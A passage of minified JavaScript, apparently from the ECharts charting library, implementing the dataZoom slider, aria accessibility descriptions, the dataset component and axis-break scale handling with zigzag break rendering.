n(e,t),e.prototype.init=function(t,e){this.api=e,this._onBrush=U(this._onBrush,this),this._onBrushEnd=U(this._onBrushEnd,this)},e.prototype.render=function(e,n,i,r){if(t.prototype.render.apply(this,arguments),xy(this,"_dispatchZoomAction",e.get("throttle"),"fixRate"),this._orient=e.getOrient(),!1!==e.get("show")){if(e.noTarget())return this._clear(),void this.group.removeAll();r&&"dataZoom"===r.type&&r.from===this.uid||this._buildView(),this._updateView()}else this.group.removeAll()},e.prototype.dispose=function(){this._clear(),t.prototype.dispose.apply(this,arguments)},e.prototype._clear=function(){by(this,"_dispatchZoomAction");var t=this.api.getZr();t.off("mousemove",this._onBrush),t.off("mouseup",this._onBrushEnd)},e.prototype._buildView=function(){var t=this.group;t.removeAll(),this._brushing=!1,this._displayables.brushRect=null,this._resetLocation(),this._resetInterval();var e=this._displayables.sliderGroup=new ho;this._renderBackground(),this._renderHandle(),this._renderDataShadow(),t.add(e),this._positionGroup()},e.prototype._resetLocation=function(){var t=this.dataZoomModel,e=this.api,n=t.get("brushSelect")?7:0,i=_f(t,e).refContainer,r=this._findCoordRect(),o=t.get("defaultLocationEdgeGap",!0)||0,a=this._orient===dR?{right:i.width-r.x-r.width,top:i.height-30-o-n,width:r.width,height:30}:{right:o,top:r.y,width:30,height:r.height},s=Sf(t.option);E(["right","top","width","height"],function(t){"ph"===s[t]&&(s[t]=a[t])});var l=yf(s,i);this._location={x:l.x,y:l.y},this._size=[l.width,l.height],this._orient===fR&&this._size.reverse()},e.prototype._positionGroup=function(){var t=this.group,e=this._location,n=this._orient,i=this.dataZoomModel.getFirstTargetAxisModel(),r=i&&i.get("inverse"),o=this._displayables.sliderGroup,a=(this._dataShadowInfo||{}).otherAxisInverse;o.attr(n!==dR||r?n===dR&&r?{scaleY:a?1:-1,scaleX:-1}:n!==fR||r?{scaleY:a?-1:1,scaleX:-1,rotation:Math.PI/2}:{scaleY:a?-1:1,scaleX:1,rotation:Math.PI/2}:{scaleY:a?1:-1,scaleX:1});var s=t.getBoundingRect([o]),l=isNaN(s.x)?0:s.x,u=isNaN(s.y)?0:s.y;t.x=e.x-l,t.y=e.y-u,t.markRedraw()},e.prototype._getViewExtent=function(){return[0,this._size[0]]},e.prototype._renderBackground=function(){var t=this.dataZoomModel,e=this._size,n=this._displayables.sliderGroup,i=t.get("brushSelect");n.add(new pR({silent:!0,shape:{x:0,y:0,width:e[0],height:e[1]},style:{fill:t.get("backgroundColor")},z2:-40}));var r=new pR({shape:{x:0,y:0,width:e[0],height:e[1]},style:{fill:"transparent"},z2:0,onclick:U(this._onClickPanel,this)}),o=this.api.getZr();i?(r.on("mousedown",this._onBrushStart,this),r.cursor="crosshair",o.on("mousemove",this._onBrush),o.on("mouseup",this._onBrushEnd)):(o.off("mousemove",this._onBrush),o.off("mouseup",this._onBrushEnd)),n.add(r)},e.prototype._renderDataShadow=function(){var t=this._dataShadowInfo=this._prepareDataShadowInfo();if(this._displayables.dataShadowSegs=[],t){var e=this._size,n=this._shadowSize||[],i=t.series,r=i.getRawData(),o=i.getShadowDim&&i.getShadowDim(),a=o&&r.getDimensionInfo(o)?i.getShadowDim():t.otherDim;if(null!=a){var s=this._shadowPolygonPts,l=this._shadowPolylinePts;if(r!==this._shadowData||a!==this._shadowDim||e[0]!==n[0]||e[1]!==n[1]){var u=r.getDataExtent(t.thisDim),c=r.getDataExtent(a),h=.3*(c[1]-c[0]);c=[c[0]-h,c[1]+h];var p,d=[0,e[1]],f=[0,e[0]],g=[[e[0],0],[0,0]],v=[],y=f[1]/Math.max(1,r.count()-1),m=e[0]/(u[1]-u[0]),_="time"===t.thisAxis.type,x=-y,b=Math.round(r.count()/e[0]);r.each([t.thisDim,a],function(t,e,n){if(b>0&&n%b)_||(x+=y);else{x=_?(+t-u[0])*m:x+y;var i=null==e||isNaN(e)||""===e,r=i?0:Ro(e,c,d,!0);i&&!p&&n?(g.push([g[g.length-1][0],0]),v.push([v[v.length-1][0],0])):!i&&p&&(g.push([x,0]),v.push([x,0])),i||(g.push([x,r]),v.push([x,r])),p=i}}),s=this._shadowPolygonPts=g,l=this._shadowPolylinePts=v}this._shadowData=r,this._shadowDim=a,this._shadowSize=[e[0],e[1]];for(var w=this.dataZoomModel,S=0;S<3;S++){var M=T(1===S);this._displayables.sliderGroup.add(M),this._displayables.dataShadowSegs.push(M)}}}function T(t){var e=w.getModel(t?"selectedDataBackground":"dataBackground"),n=new ho,i=new ah({shape:{points:s},segmentIgnoreThreshold:1,style:e.getModel("areaStyle").getAreaStyle(),silent:!0,z2:-20}),r=new lh({shape:{points:l},segmentIgnoreThreshold:1,style:e.getModel("lineStyle").getLineStyle(),silent:!0,z2:-19});return n.add(i),n.add(r),n}},e.prototype._prepareDataShadowInfo=function(){var t=this.dataZoomModel,e=t.get("showDataShadow");if(!1!==e){var n,i=this.ecModel;return t.eachTargetAxis(function(r,o){E(t.getAxisProxy(r,o).getTargetSeriesModels(),function(t){if(!(n||!0!==e&&R(gR,t.get("type"))<0)){var a,s=i.getComponent(eA(r),o).axis,l=function(t){var e={x:"y",y:"x",radius:"angle",angle:"radius"};return e[t]}(r),u=t.coordinateSystem;null!=l&&u.getOtherAxis&&(a=u.getOtherAxis(s).inverse),l=t.getData().mapDimension(l);var c=t.getData().mapDimension(r);n={thisAxis:s,series:t,thisDim:c,otherDim:l,otherAxisInverse:a}}},this)},this),n}},e.prototype._renderHandle=function(){var t=this.group,e=this._displayables,n=e.handles=[null,null],i=e.handleLabels=[null,null],r=this._displayables.sliderGroup,o=this._size,a=this.dataZoomModel,s=this.api,l=a.get("borderRadius")||0,u=a.get("brushSelect"),c=e.filler=new pR({silent:u,style:{fill:a.get("fillerColor")},textConfig:{position:"inside"}});r.add(c),r.add(new pR({silent:!0,subPixelOptimize:!0,shape:{x:0,y:0,width:o[0],height:o[1],r:l},style:{stroke:a.get("dataBackgroundColor")||a.get("borderColor"),lineWidth:1,fill:Cf.color.transparent}})),E([0,1],function(e){var o=a.get("handleIcon");!bm[o]&&o.indexOf("path://")<0&&o.indexOf("image://")<0&&(o="path://"+o);var s,l=Mm(o,-1,0,2,2,null,!0);l.attr({cursor:(s=this._orient,"vertical"===s?"ns-resize":"ew-resize"),draggable:!0,drift:U(this._onDragMove,this,e),ondragend:U(this._onDragEnd,this),onmouseover:U(this._onOverDataInfoTriggerArea,this,!0),onmouseout:U(this._onOverDataInfoTriggerArea,this,!1),z2:5});var u=l.getBoundingRect(),c=a.get("handleSize");this._handleHeight=No(c,this._size[1]),this._handleWidth=u.width/u.height*this._handleHeight,l.setStyle(a.getModel("handleStyle").getItemStyle()),l.style.strokeNoScale=!0,l.rectHover=!0,l.ensureState("emphasis").style=a.getModel(["emphasis","handleStyle"]).getItemStyle(),hc(l);var h=a.get("handleColor");null!=h&&(l.style.fill=h),r.add(n[e]=l);var p=a.getModel("textStyle"),d=(a.get("handleLabel")||{}).show||!1;t.add(i[e]=new Ql({silent:!0,invisible:!d,style:Op(p,{x:0,y:0,text:"",verticalAlign:"middle",align:"center",fill:p.getTextColor(),font:p.getFont()}),z2:10}))},this);var h=c;if(u){var p=No(a.get("moveHandleSize"),o[1]),d=e.moveHandle=new jl({style:a.getModel("moveHandleStyle").getItemStyle(),silent:!0,shape:{r:[0,0,2,2],y:o[1]-.5,height:p}}),f=.8*p,g=e.moveHandleIcon=Mm(a.get("moveHandleIcon"),-f/2,-f/2,f,f,Cf.color.neutral00,!0);g.silent=!0,g.y=o[1]+p/2-.5,d.ensureState("emphasis").style=a.getModel(["emphasis","moveHandleStyle"]).getItemStyle();var v=Math.min(o[1]/2,Math.max(p,10));(h=e.moveZone=new jl({invisible:!0,shape:{y:o[1]-v,height:p+v}})).on("mouseover",function(){s.enterEmphasis(d)}).on("mouseout",function(){s.leaveEmphasis(d)}),r.add(d),r.add(g),r.add(h)}h.attr({draggable:!0,cursor:"grab",drift:U(this._onActualMoveZoneDrift,this),ondragstart:U(this._onActualMoveZoneDragStart,this),ondragend:U(this._onActualMoveZoneDragEnd,this),onmouseover:U(this._onOverDataInfoTriggerArea,this,!0),onmouseout:U(this._onOverDataInfoTriggerArea,this,!1)})},e.prototype._resetInterval=function(){var t=this._range=this.dataZoomModel.getPercentRange(),e=this._getViewExtent();this._handleEnds=[Ro(t[0],[0,100],e,!0),Ro(t[1],[0,100],e,!0)]},e.prototype._updateInterval=function(t,e){var n=this.dataZoomModel,i=this._handleEnds,r=this._getViewExtent(),o=n.findRepresentativeAxisProxy().getMinMaxSpan(),a=[0,100];dA(e,i,r,n.get("zoomLock")?"all":t,null!=o.minSpan?Ro(o.minSpan,a,r,!0):null,null!=o.maxSpan?Ro(o.maxSpan,a,r,!0):null);var s=this._range,l=this._range=Eo([Ro(i[0],r,a,!0),Ro(i[1],r,a,!0)]);return!s||s[0]!==l[0]||s[1]!==l[1]},e.prototype._updateView=function(t){var e=this._displayables,n=this._handleEnds,i=Eo(n.slice()),r=this._size;E([0,1],function(t){var i=e.handles[t],o=this._handleHeight;i.attr({scaleX:o/2,scaleY:o/2,x:n[t]+(t?-1:1),y:r[1]/2-o/2})},this),e.filler.setShape({x:i[0],y:0,width:i[1]-i[0],height:r[1]});var o={x:i[0],width:i[1]-i[0]};e.moveHandle&&(e.moveHandle.setShape(o),e.moveZone.setShape(o),e.moveZone.getBoundingRect(),e.moveHandleIcon&&e.moveHandleIcon.attr("x",o.x+o.width/2));for(var a=e.dataShadowSegs,s=[0,i[0],i[1],r[0]],l=0;l<a.length;l++){var u=a[l],c=u.getClipPath();c||(c=new jl,u.setClipPath(c)),c.setShape({x:s[l],y:0,width:s[l+1]-s[l],height:r[1]})}this._updateDataInfo(t)},e.prototype._updateDataInfo=function(t){var e=this.dataZoomModel,n=this._displayables,i=n.handleLabels,r=this._orient,o=["",""];if(e.get("showDetail")){var a=e.findRepresentativeAxisProxy(),s=a.getAxisModel().axis.scale;if(a){var l,u=this._range;if(t){var c={start:u[0],end:u[1]},h=aA(e,a);if(h){var p=h.calculateDataWindow(c).percentInverted;c={start:p[0],end:p[1]}}l=a.calculateDataWindow(c)}else l=a.getWindow();o=[mR(e,0,l,s),mR(e,1,l,s)]}}var d=Eo(this._handleEnds.slice());function f(t){var e=rp(n.handles[t].parent,this.group),a=ap(0===t?"right":"left",e),s=this._handleWidth/2+5,l=op([d[t]+(0===t?-s:s),this._size[1]/2],e);i[t].setStyle({x:l[0],y:l[1],verticalAlign:r===dR?"middle":a,align:r===dR?a:"center",text:o[t]})}f.call(this,0),f.call(this,1)},e.prototype._onOverDataInfoTriggerArea=function(t){this._isOverDataInfoTriggerArea=t,this._showDataInfo(t)},e.prototype._showDataInfo=function(t){var e=(this.dataZoomModel.get("handleLabel")||{}).show||!1,n=this.dataZoomModel.getModel(["emphasis","handleLabel"]).get("show")||!1,i=t||this._dragging?n:e,r=this._displayables,o=r.handleLabels;o[0].attr("invisible",!i),o[1].attr("invisible",!i),r.moveHandle&&this.api[i?"enterEmphasis":"leaveEmphasis"](r.moveHandle,1)},e.prototype._onActualMoveZoneDrift=function(t,e,n){this.api.getZr().setCursorStyle("grabbing"),this._onDragMove("all",t,e,n)},e.prototype._onActualMoveZoneDragStart=function(t){t.target.attr("cursor","grabbing"),this._showDataInfo(!0)},e.prototype._onActualMoveZoneDragEnd=function(t){t.target.attr("cursor","grab"),this._onDragEnd()},e.prototype._onDragMove=function(t,e,n,i){this._dragging=!0,ve(i.event);var r=op([e,n],this._displayables.sliderGroup.getLocalTransform(),!0),o=this._updateInterval(t,r[0]),a=this.dataZoomModel.get("realtime");this._updateView(!a),o&&a&&this._dispatchZoomAction(!0)},e.prototype._onDragEnd=function(){this._dragging=!1,this._isOverDataInfoTriggerArea||this._showDataInfo(!1),!this.dataZoomModel.get("realtime")&&this._dispatchZoomAction(!1)},e.prototype._onClickPanel=function(t){var e=this._size,n=this._displayables.sliderGroup.transformCoordToLocal(t.offsetX,t.offsetY);if(!(n[0]<0||n[0]>e[0]||n[1]<0||n[1]>e[1])){var i=this._handleEnds,r=(i[0]+i[1])/2,o=this._updateInterval("all",n[0]-r);this._updateView(),o&&this._dispatchZoomAction(!1)}},e.prototype._onBrushStart=function(t){var e=t.offsetX,n=t.offsetY;this._brushStart=new Ae(e,n),this._brushing=!0,this._brushStartTime=+new Date},e.prototype._onBrushEnd=function(t){if(this._brushing){var e=this._displayables.brushRect;if(this._brushing=!1,e){e.attr("ignore",!0);var n=e.shape;if(!(+new Date-this._brushStartTime<200&&Math.abs(n.width)<5)){var i=this._getViewExtent(),r=[0,100],o=this._handleEnds=[n.x,n.x+n.width],a=this.dataZoomModel.findRepresentativeAxisProxy().getMinMaxSpan();dA(0,o,i,0,null!=a.minSpan?Ro(a.minSpan,r,i,!0):null,null!=a.maxSpan?Ro(a.maxSpan,r,i,!0):null),this._range=Eo([Ro(o[0],i,r,!0),Ro(o[1],i,r,!0)]),this._updateView(),this._dispatchZoomAction(!1)}}}},e.prototype._onBrush=function(t){this._brushing&&(ve(t.event),this._updateBrushRect(t.offsetX,t.offsetY))},e.prototype._updateBrushRect=function(t,e){var n=this._displayables,i=this.dataZoomModel,r=n.brushRect;r||(r=n.brushRect=new pR({silent:!0,style:i.getModel("brushStyle").getItemStyle()}),n.sliderGroup.add(r)),r.attr("ignore",!1);var o=this._brushStart,a=this._displayables.sliderGroup,s=a.transformCoordToLocal(t,e),l=a.transformCoordToLocal(o.x,o.y),u=this._size;s[0]=Math.max(Math.min(u[0],s[0]),0),r.setShape({x:l[0],y:0,width:s[0]-l[0],height:u[1]})},e.prototype._dispatchZoomAction=function(t){var e=this._range;this.api.dispatchAction({type:"dataZoom",from:this.uid,dataZoomId:this.dataZoomModel.id,animation:t?vR:null,start:e[0],end:e[1]})},e.prototype._findCoordRect=function(){var t,e=iA(this.dataZoomModel).infoList;if(!t&&e.length){var n=e[0].model.coordinateSystem;t=n.getRect&&n.getRect()}if(!t){var i=this.api.getWidth(),r=this.api.getHeight();t={x:.2*i,y:.2*r,width:.6*i,height:.6*r}}return t},e.type="dataZoom.slider",e}(hA);function mR(t,e,n,i){var r=t.get("labelFormatter"),o=t.get("labelPrecision");null!=o&&"auto"!==o||(o=n.valuePrecision);var a=n.value[e],s=null==a||isNaN(a)?"":xb(i)||mb(i)?i.getLabel({value:Math.round(a)}):isFinite(o)?zo(a,o,!0):a+"";return X(r)?r(a,s):j(r)?r.replace("{value}",s):s}function _R(t){t.registerComponentModel(hR),t.registerComponentView(yR),_A(t)}var xR={label:{enabled:!0},decal:{show:!1}},bR=Ta(),wR=Ta(),SR=Xa(function(t,e){var n=t.getModel("aria");if(!n.get("enabled"))return;var i=wR(t).scope||(wR(t).scope={}),r=C(xR);function o(t,e){if(!j(t))return t;var n=t;return E(e,function(t,e){n=n.replace(new RegExp("\\{\\s*"+e+"\\s*\\}","g"),t)}),n}I(r.label,t.getLocaleModel().get("aria"),!1),I(n.option,r,!1),function(){if(n.getModel("decal").get("show")){var e=mt();t.eachSeries(function(t){t.isColorBySeries()||(bR(t).scope=e.get(t.type)||e.set(t.type,{}))}),t.eachSeries(function(e){if(X(e.enableAriaDecal))e.enableAriaDecal();else{var n=e.getData();if(e.isColorBySeries()){var r=Qf(e.ecModel,e.name,i,t.getSeriesCount()),o=n.getVisual("decal");n.setVisual("decal",c(o,r))}else{var a=e.getRawData(),s={},l=bR(e).scope;n.each(function(t){var e=n.getRawIndex(t);s[e]=t});var u=a.count();a.each(function(t){var i=s[t],r=a.getName(t)||t+"",o=Qf(e.ecModel,r,l,u),h=n.getItemVisual(i,"decal");n.setItemVisual(i,"decal",c(h,o))})}}function c(t,e){var n=t?A(A({},e),t):e;return n.dirty=!0,n}})}}(),function(){var i=e.getZr().dom;if(i){var r=t.getLocaleModel().get("aria"),a=n.getModel("label");if(a.option=L(a.option,r),a.get("enabled"))if(i.setAttribute("role","img"),a.get("description"))i.setAttribute("aria-label",a.get("description"));else{var s,l=t.getSeriesCount(),u=a.get(["data","maxCount"])||10,c=a.get(["series","maxCount"])||10,h=Math.min(l,c);if(!(l<1)){var p=function(){var e=t.get("title");return e&&e.length&&(e=e[0]),e&&e.text}();s=p?o(a.get(["general","withTitle"]),{title:p}):a.get(["general","withoutTitle"]);var d=[];s+=o(l>1?a.get(["series","multiple","prefix"]):a.get(["series","single","prefix"]),{seriesCount:l}),t.eachSeries(function(e,n){if(n<h){var i=void 0,r=e.get("name")?"withName":"withoutName";i=o(i=l>1?a.get(["series","multiple",r]):a.get(["series","single",r]),{seriesId:e.seriesIndex,seriesName:e.get("name"),seriesType:(x=e.subType,b=t.getLocaleModel().get(["series","typeNames"]),b[x]||b.chart)});var s=e.getData();s.count()>u?i+=o(a.get(["data","partialData"]),{displayCnt:u}):i+=a.get(["data","allData"]);for(var c=a.get(["data","separator","middle"]),p=a.get(["data","separator","end"]),f=a.get(["data","excludeDimensionId"]),g=[],v=0;v<s.count();v++)if(v<u){var y=s.getName(v),m=f?H(s.getValues(v),function(t,e){return-1===R(f,e)}):s.getValues(v),_=a.get(["data",y?"withName":"withoutName"]);g.push(o(_,{name:y,value:m.join(c)}))}i+=g.join(c)+p,d.push(i)}var x,b});var f=a.getModel(["series","multiple","separator"]),g=f.get("middle"),v=f.get("end");s+=d.join(g)+v,i.setAttribute("aria-label",s)}}}}()});function MR(t){if(t&&t.aria){var e=t.aria;null!=e.show&&(e.enabled=e.show),e.label=e.label||{},E(["description","general","series","data"],function(t){null!=e[t]&&(e.label[t]=e[t])})}}var TR=function(t){function e(){var e=null!==t&&t.apply(this,arguments)||this;return e.type="dataset",e}return n(e,t),e.prototype.init=function(e,n,i){t.prototype.init.call(this,e,n,i),this._sourceManager=new Av(this),Pv(this)},e.prototype.mergeOption=function(e,n){t.prototype.mergeOption.call(this,e,n),Pv(this)},e.prototype.optionUpdated=function(){this._sourceManager.dirty()},e.prototype.getSourceManager=function(){return this._sourceManager},e.type="dataset",e.defaultOption={seriesLayoutBy:bu},e}(kf),kR=function(t){function e(){var e=null!==t&&t.apply(this,arguments)||this;return e.type="dataset",e}return n(e,t),e.type="dataset",e}(ay);var CR=function(){function t(e,n){lb(this,t.decoratedMethods),this._outOfBrk=db(null,n);this._linear=db(null,n);ub(this),this.breaks=e&&e.breaks||[]}return t.prototype.hasBreaks=function(){return!!this.breaks.length},t.prototype.calcNiceTickMultiple=function(t,e){for(var n=0;n<this.breaks.length;n++){var i=this.breaks[n];if(i.vmin<t&&t<i.vmax){var r=e(t,i.vmax);return r}}return 0},t.decoratedMethods={needTransform:function(){return!this.breaks.length},getExtent:function(){return this._outOfBrk.getExtent()},getExtentUnsafe:function(t,e){return null==e||2===e?this._outOfBrk.getExtentUnsafe(t,null):this._linear.getExtentUnsafe(t,null)},setExtent:function(t,e){this.setExtent2(0,t,e)},setExtent2:function(t,e,n){Ea(e,n)&&(0===t&&function(t,e){var n=0,i={tpAbs:{span:0,val:0},tpPrct:{span:0,val:0}},r=function(){return{has:!1,span:NaN,inExtFrac:NaN,val:NaN}},o={S:{tpAbs:r(),tpPrct:r()},E:{tpAbs:r(),tpPrct:r()}};E(t.breaks,function(t){var r=t.gapParsed;"tpPrct"===r.type&&(n+=r.val);var a=OR(t,e);if(a){var s=a.vmin!==t.vmin,l=a.vmax!==t.vmax,u=a.vmax-a.vmin;if(s&&l);else if(s||l){var c=s?"S":"E";o[c][r.type].has=!0,o[c][r.type].span=u,o[c][r.type].inExtFrac=u/(t.vmax-t.vmin),o[c][r.type].val=r.val}else i[r.type].span+=u,i[r.type].val+=r.val}});var a=n*(e[1]-e[0]+0+(i.tpAbs.val-i.tpAbs.span)+(o.S.tpAbs.has?(o.S.tpAbs.val-o.S.tpAbs.span)*o.S.tpAbs.inExtFrac:0)+(o.E.tpAbs.has?(o.E.tpAbs.val-o.E.tpAbs.span)*o.E.tpAbs.inExtFrac:0)-i.tpPrct.span-(o.S.tpPrct.has?o.S.tpPrct.span*o.S.tpPrct.inExtFrac:0)-(o.E.tpPrct.has?o.E.tpPrct.span*o.E.tpPrct.inExtFrac:0))/(1-i.tpPrct.val-(o.S.tpPrct.has?o.S.tpPrct.val*o.S.tpPrct.inExtFrac:0)-(o.E.tpPrct.has?o.E.tpPrct.val*o.E.tpPrct.inExtFrac:0));E(t.breaks,function(t){var e=t.gapParsed;"tpPrct"===e.type&&(t.gapReal=0!==n?Mo(a,0)*e.val/n:0),"tpAbs"===e.type&&(t.gapReal=e.val),null==t.gapReal&&(t.gapReal=0)})}(this,[e,n]),this._outOfBrk.setExtent2(t,e,n),this._linear.setExtent2(t,this.transformIn(e,null),this.transformIn(n,null)))},normalize:function(t){return this._linear.normalize(this.transformIn(t,null))},scale:function(t){return this.transformOut(this._linear.scale(t),null)},contain:function(t){return this._outOfBrk.contain(t)},transformIn:function(t,e){if(e&&2===e.depth)return t;for(var n=DR,i=AR,r=!0,o=0;o<this.breaks.length;o++){var a=this.breaks[o];if(t<=a.vmax){t>a.vmin?n+=a.vmin-i+(t-a.vmin)/(a.vmax-a.vmin)*a.gapReal:n+=t-i,i=a.vmax,r=!1;break}n+=a.vmin-i+a.gapReal,i=a.vmax}return r&&(n+=t-i),n},transformOut:function(t,e){if(e&&2===e.depth)return t;for(var n=DR,i=AR,r=!0,o=0,a=0;a<this.breaks.length;a++){var s=this.breaks[a],l=n+s.vmin-i,u=l+s.gapReal;if(t<=u){o=t>l?s.vmin+(t-l)/(u-l)*(s.vmax-s.vmin):i+t-n,i=s.vmax,r=!1;break}n=u,i=s.vmax}return r&&(o=i+t-n),o}},t}();function IR(t,e){return new CR(t,e)}var DR=0,AR=0;function PR(t,e,n,i,r,o){"no"!==t&&E(n,function(n){var a=OR(n,o);if(a)for(var s=e.length-1;s>=0;s--){var l=e[s],u=i(l),c=3*r/4;u>a.vmin-c&&u<a.vmax+c&&("preserve_extent_bound"!==t||u!==o[0]&&u!==o[1])&&e.splice(s,1)}})}function LR(t,e,n,i){E(e,function(e){var r=OR(e,n);r&&(t.push({value:r.vmin,break:{type:"vmin",parsedBreak:r},time:i?i(r):void 0}),t.push({value:r.vmax,break:{type:"vmax",parsedBreak:r},time:i?i(r):void 0}))}),e.length&&t.sort(function(t,e){return t.value-e.value})}function OR(t,e){var n=Mo(t.vmin,e[0]),i=So(t.vmax,e[1]);return n<i||n===i&&n>e[0]&&n<e[1]?{vmin:n,vmax:i,breakOption:t.breakOption,gapParsed:t.gapParsed,gapReal:t.gapReal}:null}function RR(t,e,n){var i=[];if(!t)return{breaks:i};E(t,function(t){if(t&&null!=t.start&&null!=t.end&&!t.isExpanded){var r={breakOption:C(t),vmin:e.parse(t.start),vmax:e.parse(t.end),gapParsed:{type:"tpAbs",val:0},gapReal:null};if(null!=t.gap){var o=!1;if(j(t.gap)){var a=ht(t.gap);if(a.match(/%$/)){var s=parseFloat(a)/100;(function(t){return t>=0&&t<.99999})(s)||(s=0),r.gapParsed.type="tpPrct",r.gapParsed.val=s,o=!0}}if(!o){var l=e.parse(t.gap);(!isFinite(l)||l<0)&&(l=0),r.gapParsed.type="tpAbs",r.gapParsed.val=l}}if(r.vmin===r.vmax&&(r.gapParsed.type="tpAbs",r.gapParsed.val=0),n&&n.noNegative&&E(["vmin","vmax"],function(t){r[t]<0&&(r[t]=0)}),r.vmin>r.vmax){var u=r.vmax;r.vmax=r.vmin,r.vmin=u}i.push(r)}}),i.sort(function(t,e){return t.vmin-e.vmin});var r=-1/0;return E(i,function(t,e){r>t.vmin&&(i[e]=null),r=t.vmax}),{breaks:H(i,function(t){return!!t})}}function NR(t,e){return BR(e)===BR(t)}function BR(t){return t.start+"_\0_"+t.end}function zR(t,e,n){var i=[];E(t,function(t,n){var r=e(t);r&&"vmin"===r.type&&i.push([n])}),E(t,function(n,r){var o=e(n);if(o&&"vmax"===o.type){var a=G(i,function(n){return NR(e(t[n[0]]).parsedBreak.breakOption,o.parsedBreak.breakOption)});a&&a.push(r)}});var r=[];return E(i,function(e){2===e.length&&r.push(n?e:[t[e[0]],t[e[1]]])}),r}function ER(t,e,n,i){if(e.break){var r=e.break.parsedBreak,o=G(n,function(t){return NR(t.breakOption,e.break.parsedBreak.breakOption)}),a={lookup:i,depth:2},s={vmin:t.transformOut(r.vmin,a),vmax:t.transformOut(r.vmax,a),breakOption:r.breakOption,gapParsed:C(o.gapParsed),gapReal:r.gapReal};return{tickVal:s[e.break.type],vBreak:{type:e.break.type,parsedBreak:s}}}}function VR(t,e,n,i,r){r.original=RR(t,e,n);var o=r.transformed=RR(t,e,n),a=r.lookup;o.breaks=V(o.breaks,function(t,n){var r={depth:2},o=e.transformIn(t.vmin,r),s=e.transformIn(t.vmax,r),l={type:t.gapParsed.type,val:"tpAbs"===t.gapParsed.type?e.transformIn(t.vmin+t.gapParsed.val,r)-o:t.gapParsed.val};return a.from[i+n]=o,a.to[i+n]=t.vmin,a.from[i+n+1]=s,a.to[i+n+1]=t.vmax,{vmin:o,vmax:s,gapParsed:l,gapReal:t.gapReal,breakOption:t.breakOption}})}var FR={vmin:"start",vmax:"end"};function HR(t,e){return e&&((t=t||{}).break={type:FR[e.type],start:e.parsedBreak.vmin,end:e.parsedBreak.vmax}),t}function GR(){var t;t={createBreakScaleMapper:IR,pruneTicksByBreak:PR,addBreaksToTicks:LR,parseAxisBreakOption:RR,identifyAxisBreak:NR,serializeAxisBreakIdentifier:BR,retrieveAxisBreakPairs:zR,getTicksBreakOutwardTransform:ER,parseAxisBreakOptionInwardTransform:VR,makeAxisLabelFormatterParamBreak:HR},hd||(hd=t)}var WR=Ta();function UR(t,e,n,i,r){var o=n.axis;if(!o.scale.isBlank()&&pd()){var a=pd().retrieveAxisBreakPairs(o.scale.getTicks({breakTicks:"only_break"}),function(t){return t.break},!1);if(a.length){var s=n.getModel("breakArea"),l=s.get("zigzagAmplitude"),u=s.get("zigzagMinSpan"),c=s.get("zigzagMaxSpan");u=Math.max(2,u||0),c=Math.max(u,c||0);var h=s.get("expandOnClick"),p=s.get("zigzagZ"),d=s.getModel("itemStyle").getItemStyle(),f=d.stroke,g=d.lineWidth,v=d.lineDash,y=d.fill,m=new ho({ignoreModelZ:!0}),_=o.isHorizontal(),x=WR(e).visualList||(WR(e).visualList=[]);E(x,function(t){return t.shouldRemove=!0});for(var b=function(t){var e=a[t][0].break.parsedBreak,s=[];s[0]=o.toGlobalCoord(o.dataToCoord(e.vmin,!0)),s[1]=o.toGlobalCoord(o.dataToCoord(e.vmax,!0)),s[1]<s[0]&&s.reverse();var b=function(t,e){var n=G(t,function(t){return pd().identifyAxisBreak(t.parsedBreak.breakOption,e.breakOption)});return n||t.push(n={zigzagRandomList:[],parsedBreak:e,shouldRemove:!1}),n}(x,e);b.shouldRemove=!1;var w=new ho;!function(t,e,n,r,o,a){var s={stroke:f,lineWidth:g,lineDash:v,fill:"none"},h=o?0:1,m=1-h,_=i[Uh[m]]+i[Zh[m]];function x(t){var e=[],n=[];e[h]=n[h]=t,e[m]=i[Uh[m]],n[m]=_;var r={x1:e[0],y1:e[1],x2:n[0],y2:n[1]};return Wl(r,r,{lineWidth:1}),e[0]=r.x1,e[1]=r.y1,e[h]}n=x(n),r=x(r);for(var b=[],w=[],S=!0,M=i[Uh[m]],T=0;;T++){var k=M===i[Uh[m]],C=M>=_;C&&(M=_);var I=[],D=[];I[h]=n,D[h]=r,k||C||(I[h]+=S?-l:l,D[h]-=S?l:-l),I[m]=M,D[m]=M,b.push(I),w.push(D);var A=void 0;if(T<t.length?A=t[T]:(A=Math.random(),t.push(A)),M+=A*(c-u)+u,S=!S,C)break}var P=pd().serializeAxisBreakIdentifier(a.breakOption);if(e.add(new lh({anid:"break_a_"+P,shape:{points:b},style:s,z:p})),0!==a.gapReal){e.add(new lh({anid:"break_b_"+P,shape:{points:w},style:s,z:p}));var L=w.slice();L.reverse();var O=b.concat(L);e.add(new ah({anid:"break_c_"+P,shape:{points:O},style:{fill:y,opacity:d.opacity},z:p}))}}(b.zigzagRandomList,w,s[0],s[1],_,e),h&&w.on("click",function(){var t={type:gk,breaks:[{start:e.breakOption.start,end:e.breakOption.end}]};t[o.dim+"AxisIndex"]=n.componentIndex,r.dispatchAction(t)}),w.silent=!h,m.add(w)},w=0;w<a.length;w++)b(w);t.add(m),function(t){for(var e=t.length-1;e>=0;e--)t[e].shouldRemove&&t.splice(e,1)}(x)}}}function ZR(t,e,n,i){var r=t.axis,o=n.transform;ct(i.style);var a=r.getExtent();r.inverse&&(a=a.slice()).reverse();var s=V(pd().retrieveAxisBreakPairs(r.scale.getTicks({breakTicks:"only_break"}),function(t){return t.break},!1),function(t){var e=t[0].break.parsedBreak,n=[r.dataToCoord(e.vmin,!0),r.dataToCoord(e.vmax,!0)];return n[0]>n[1]&&n.reverse(),{coordPair:n,brkId:pd().serializeAxisBreakIdentifier(e.breakOption)}});s.sort(function(t,e){return t.coordPair[0]-e.coordPair[0]});for(var l=a[0],u=null,c=0;c<s.length;c++){var h=s[c],p=Math.max(h.coordPair[0],a[0]),d=Math.min(h.coordPair[1],a[1]);l<=p&&f(l,p,u,h),l=d,u=h}function f(t,n,r,a){function s(t,e){o&&(Ut(t,t,o),Ut(e,e,o))}function l(t,e){var n={x1:t[0],y1:t[1],x2:e[0],y2:e[1]};Wl(n,n,i.style),t[0]=n.x1,t[1]=n.y1,e[0]=n.x2,e[1]=n.y2}var u=[t,0],c=[n,0],h=[t,5],p=[n,5];s(u,h),l(u,h),s(c,p),l(c,p),l(u,c);var d=new hh(A({shape:{x1:u[0],y1:u[1],x2:c[0],y2:c[1]}},i));e.add(d),d.anid="breakLine_"+(r?r.brkId:"\0")+"_\0_"+(a?a.brkId:"\0")}l<=a[1]&&f(l,a[1],u,null)}function 